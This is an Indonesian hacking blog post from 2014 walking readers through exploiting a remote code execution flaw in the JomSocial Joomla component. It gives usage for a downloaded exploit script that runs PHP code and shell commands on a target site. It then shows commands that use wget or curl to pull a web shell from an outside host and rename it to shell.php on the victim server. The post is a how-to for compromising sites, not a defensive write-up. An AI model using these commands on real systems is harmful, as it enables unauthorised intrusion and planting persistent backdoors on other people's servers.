Thursday, 5 June 2014

JomSocial | Remote Code Execution

bertemu lagi dengan saya Mr. DxRoot Indonesia, semoga sehat selalu untuk para DxRooters dan para pengunjung situs kami ini.

kali ini akan membahas tentang JomSocial.

apa sih JomSocial itu ?
JomSocial adalah perangkat komponen joomla yang memungkinkan Anda untuk membuat situs jaringan sosial canggih yang populer bebas penggunaannya dan open source software joomla.

Langkah-langkah Exsploitasi dengan JomSocial.
  1. Download terlebih dahulu Python => SEDOT INI.
  2. Download juga Exsploitnya disini => SEDOT LAGI.
  3. Install Software Python.
  4. Open cmd.
  5. Masuk dir dimana exploit berada.
  6. Jalankan exploit.

Perintah:
1. exploit.py -u http://127.0.0.1/index.php -opsi

Macam-macam opsi:
1. u -> url / web target format : http://situs.com/index.php
2. p -> mengeksekusi kode php : "echo 'Hello World!';"
3. s -> mengeksekusi command shell : "netstat -n" dll .
4. c -> menggunakan pemakaian functions : passthru




Cara tanam shell :
Cara pertama :
1. exploit.py -u http://127.0.0.1/index.php -s "wget http:situs.com/shell.txt"
2. exploit.py -u http://127.0.0.1/index.php -s "mv shell.txt shell.php"

Cara kedua :
1. exploit.py -u http://127.0.0.1/index.php -s "curl http:situs.com/shell.txt -o shell.php"


itulah sedikit informasi dari kami, semoga bermanfaat untuk pengetahuan semata.